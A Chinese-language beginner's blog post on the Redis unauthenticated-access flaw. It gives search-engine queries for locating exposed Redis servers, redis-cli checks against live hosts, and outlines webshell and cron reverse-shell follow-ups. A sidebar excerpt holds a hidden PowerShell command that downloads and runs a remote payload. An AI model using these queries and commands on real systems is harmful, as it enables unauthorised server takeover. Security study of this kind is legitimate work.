关于redis未授权漏洞的简单理解

最新推荐文章于 2024-05-29 13:35:26 发布
最新推荐文章于 2024-05-29 13:35:26 发布
阅读量1.3k 收藏 3
点赞数
文章标签: redis 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45895237/article/details/122375280
版权

零基础菜鸟研究一下下,理解错了欢迎指正~

一、知识点

Redis是一个数据库/服务器。

Redis默认配置是不需要密码认证的,也就是说只要连接的Redis服务器的host和port正确,就可以连接使用,也就是直接拿下权限。默认端口为6379。

我们可以尝试用redis-cli验证并利用有无这个redis未授权漏洞。

redis-cli是Redis命令行工具,是一个命令行客户端程序,可以将命令直接发送到Redis,并直接从终端读取服务器返回的应答。

语法:redis-cli -h 192.168.20.33 -p 6379

用法:redis-cli [OPTIONS] [cmd [arg [arg …]]]
-h <主机ip>,默认是127.0.0.1
-p <端口>,默认是6379
-a <密码>,如果redis加锁,需要传递密码
–help,显示帮助信息

.

二、怎么找redis未授权的网页?

1.fofa语法搜索:
port=“6379” && protocol=“redis”
在这里插入图片描述

2.奇安信语法搜索:
port=“6379” && protocol=“redis”
在这里插入图片描述

3.ZoomEye钟馗之眼语法搜索:
port:6379 +service:“redis”
在这里插入图片描述

这个搜索可以直接返回redis的各种信息,有这个信息的代表着这个网站是一定有redis未授权漏洞,一验一个准,我整个就爱住了好吧!

.

三、验证

我们根据上面三种方法找一个ip,用redis-cli工具去验证并且利用。
我是在windows下来验证的,linux也可以的(这个网上很多教程,自己去百度就好了)
windows版的工具下载:https://github.com/dmajkic/redis/downloads

我们链接后,用info server命令(这是redis下的一个查看服务器的信息的命令)
出现了返回信息,说明这个未授权漏洞是存在的
在这里插入图片描述

也可以用这个keys *命令验证(这个命令的意思是获取 redis 中所有的 key)
在这里插入图片描述

空列表,表示没有查到任何key,说明没有设置密码,未授权漏洞存在
.

.
在这里插入图片描述

redis客户端连接成功,但是操作报异常——(error) NOAUTH Authentication required
错误的含义是说你没有认证,说明没有使用密码连接,如果你知道密码可以用-a参数进行认证
当然,我反正是不知道,所以没有这个未授权漏洞……

.

四、后续简单利用理解

1.如果知道web的根目录且开web服务,那么操作上最简单的就是写入webshell

找到数据库的安装路径config get dir——这个好像没什么用额……
在这里插入图片描述

设置文件路径?注意要加双引号,否则不能成功
在这里插入图片描述

后续可以写一些文件在这个文件夹里,
只是进行一下操作,我这也不知道web路径,基本上都利用不了,就到这吧……

后续的写入webshell可以看看这两篇文章:
https://www.cnblogs.com/zw1sh/p/13812427.html
https://www.cnblogs.com/bmjoker/p/9548962.html
.

2.如果是linux系统,那么有一种不需要什么限制条件的getshell方法

利用计划任务执行命令反弹shell,这个限制条件就是权限是root

我这不是,就不操作了哈……

.
.
.
参考文章:
https://blog.csdn.net/gfd54gd5f46/article/details/78227087
https://blog.51cto.com/wt7315/2051136
https://www.cnblogs.com/chengxuzhimei/p/5236093.html
https://blog.csdn.net/wukong_666/article/details/51996832
这里有脚本下载链接:https://blog.csdn.net/m0_51803069/article/details/110499414

next-next
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Redis授权访问
m0_67393342的博客
08-24 1942
漏洞复现的过程磕磕绊绊,但还是坚持了下来,并且收获甚大。中正如学习之路一样,即使再艰难也要坚持学习,解决问题的方法不止一个,此法不行另寻他法。
网络资产信息收集利器介绍
大河之犬的博客
06-26 3561
Censys搜索引擎能够扫描整个互联网,Censys 每天都会扫描IPv4地址空间,以搜索所有联网设备并收集相关的信息,并返回一份有关资源(如设备、网站和证书)配置和部署信息的总体报告。FOFA是一款非常强大的搜索引擎,FOFA(网络空间资产检索系统)是世界上数据覆盖更完整的IT设备搜索引擎,拥有全球联网IT设备更全的DNA信息。相对于shodan来说FOFA的优点就是更加本土化,拥有更多的域名数据,建立了全球最大的资产规则集,而且现在已经更新了识别蜜罐的功能。钟馗之眼搜索引擎偏向web应用层面的搜索。
windows环境redis授权利用手法总结
最新发布
2401_84466336的博客
05-29 1247
redis 目标ip:6379>set x "/r/n/r/npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://csip:80/a'))\"/r/n/r/n。也就是说在`c:/windows/system32/wbem/mof/`目录下的mof文件会每5秒自动执行一次,这样就不需要重启机器就能获取权限了。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
搜索引擎语法
十五年游戏主程转渗透之路
03-27 1854
谷歌,奇安信,fofa,道途,钟馗之眼,撒旦
信息收集--空间搜索引擎/网盘
热门推荐
m0_37856131的博客
02-26 1万+
信息收集--空间搜索引擎/网盘
2023-04-信息收集
山兔的博客
04-23 439
不管在渗透测试,红蓝对抗,CTF,漏洞挖掘,信息收集往往是最关键的,好的信息收集是取得好成绩的关键所在,记得有一个大佬说过,渗透测试的本质就是信息收集,好的信息收集,是成功的一半,我们不仅要具备一般的信息收集思路,还需要熟练掌握基本的工具,以便于高效的拿下目标,进而进行权限提升,横向移动,权限维持,拿下域控。收集域名,我们需要收集目标系统的组织架构,IT资产,敏感信息泄露,供应商的信息等各个方面,通过对收集的信息进行归类,快速定位薄弱的资产,利用Nday,零day,实施攻击,拿下目标系统。
web安全信息收集
weixin_53519320的博客
10-30 2670
信息收集 拿到目标先收集信息 一 收集域名信息 1.whois查询一句话说明就是 查询注册人信息,注册人预留邮箱,电话,姓名后期可以做成社工字典 推荐实用性高的地址 windows 站长之家 linux whois -h 查看使用方法 2.备案信息查询 网站备案信息是根据国家法律法规规定,由网站所有者向国家有关部门申请的备案,是国家信息产业部对网站的一种管理途径,是为了防止在网上从事非法网站经营活动,当然主要是针对国内网站。 备案查询我们主要关注的是:单位信息例如名称、备案编号、网站负责人、法人、电子邮箱
Redis授权访问配合SSH key文件利用详解
09-09
总的来说,理解并实施这些安全最佳实践对于保护Redis服务器免受授权访问和相关攻击至关重要。在云环境中尤其需要注意,因为配置错误可能导致更大的安全风险。通过严格的安全策略和持续的监控,可以显著降低Redis...
redis4.0.8
11-13
Redis,全称Remote Dictionary Server,是一款高性能的...理解安装过程、注意事项以及如何操作Redis,对于管理和维护大数据环境至关重要。通过不断的实践和学习,你将能更好地利用Redis来处理和管理你的大数据任务。
apache及redis部署
08-22
注意,为了安全,建议禁用授权的客户端连接。 3. **启动Redis**:启动Redis服务并检查状态: ``` sudo systemctl start redis sudo systemctl status redis ``` 4. **测试Redis**:使用Redis客户端工具(如...
Redis 核心技术 + 实战
02-21
- 安全:设置访问权限、防止授权访问,定期更新版本以修复安全漏洞。 通过深入学习"Redis 核心技术 + 实战",我们可以全面掌握 Redis 的使用方法,为实际项目中的高效数据管理打下坚实基础。实践出真知,理论...
redis安全学习小记1
08-03
为了防止授权访问,Redis提供了一种简单的认证机制,通过`config set requirepass`命令设置密码,或者在配置文件中添加`requirepass`字段。一旦设置了密码,客户端必须先使用`AUTH`命令传递密码才能执行其他操作。...
JBOSS授权漏洞总结
m0_64481831的博客
04-03 1115
JBOSS是一个基于J2EE的开放源代码应用服务器,也是一个管理EJB的容器和服务器,默认使用8080端口监听。JBOSS授权访问漏洞介绍漏洞原理JBOSS授权漏洞在默认情况下无需账号密码就可以直接访问后台管理控制台页面(),导致攻击者可以获取网站信息、上传webshell,获取服务器权限等。
web渗透测试漏洞复现:ZooKeeper授权漏洞复现
HACKONE的博客
03-30 604
ZooKeeper 是一个分布式的、开源的协调服务,最初由雅虎开发,现隶属于 Apache 软件基金会,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件,旨在为大型分布式系统提供一致性的服务。ZooKeeper 的设计目的是简化分布式应用程序的开发和维护,它通过提供一组简单易用的原语和数据模型,为分布式系统中的进程提供协作服务。
奇安信2020安全开发工程师(5月31日)
weixin_43898017的博客
09-05 112
CC攻击是DDoS攻击的一种类型,使用代理服务器向受害服务器发送大量貌似合法的请求。X-Forwarded-For请求头包含了客户端的原始IP地址,通过HTTP代理或负载均衡方式连接的Web服务器可以识别该请求头,从而获取到客户端的原始IP地址。int *p[10]表示一个有十个指针的数组,这10个指针是指向整型数的(指针数组)3.线程是CPU独立运行和调度的基本单位,进程是os进行资源分配和调度的基本单位。int (*p)[10]表示一个指向10个整型数数组的指针(数组指针)是正确的,可以不要循环体。
Memcache授权访问漏洞
G3et的博客
04-22 198
memcache授权访问漏洞,默认的 11211 端口不需要密码即可访问,攻击者可获取数据库中信息,造成严重的信息泄露。
网络空间搜索引擎Fofa的简单使用
谢公子的博客
05-29 5743
Fofa Fofa 是白帽汇推出的一款网络空间搜索引擎,它通过进行网络空间测绘,能够帮助研究人员或者企业迅速进行网络资产匹配。例如进行漏洞影响范围分析、应用分布统计、应用流行度等。在渗透测试过程中,Fofa能帮助测试人员快速发现目标资产。 查找使用指定应用的IP app="Coremail" #查找使用Coremail的网站 app="BEA-WebLogic-Server" #查找使用Weblogic的网站 app="CCTV-Cameras"
【SRC挖掘实录】逻辑漏洞
dbabs的博客
05-24 696
常见的OWASP漏洞,通过漏洞扫描工具,大多支持自动化或者半自动化扫描出来,并且传统的安全设备或者防护措施收效甚微。但逻辑漏洞是和系统自身功能和逻辑有关系的漏洞,每一家的漏洞出现可能存在一定的独特性,很难复制或者通过规则脚本和漏扫工具扫描出来,因此逻辑漏洞大多需要配合代码审计和手段测试才可以发现相关漏洞,也是工具无法代替人工的漏洞。这三个漏洞通常都出现在用户登录界面,是由于开发者对用户进行严格的身份鉴权和验证导致的漏洞
【每日渗透笔记】后台弱口令+授权尝试
10-29 8082
【后台弱口令+授权】纯属不放过任何可能
Redis授权漏洞的危害
04-04
Redis授权漏洞的危害包括但不限于以下几点: 1. 数据泄露:攻击者可以通过访问Redis授权的服务,获取到Redis中存储的敏感数据,例如用户密码、数据库信息、业务数据等。 2. 数据篡改:攻击者可以通过访问Redis...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值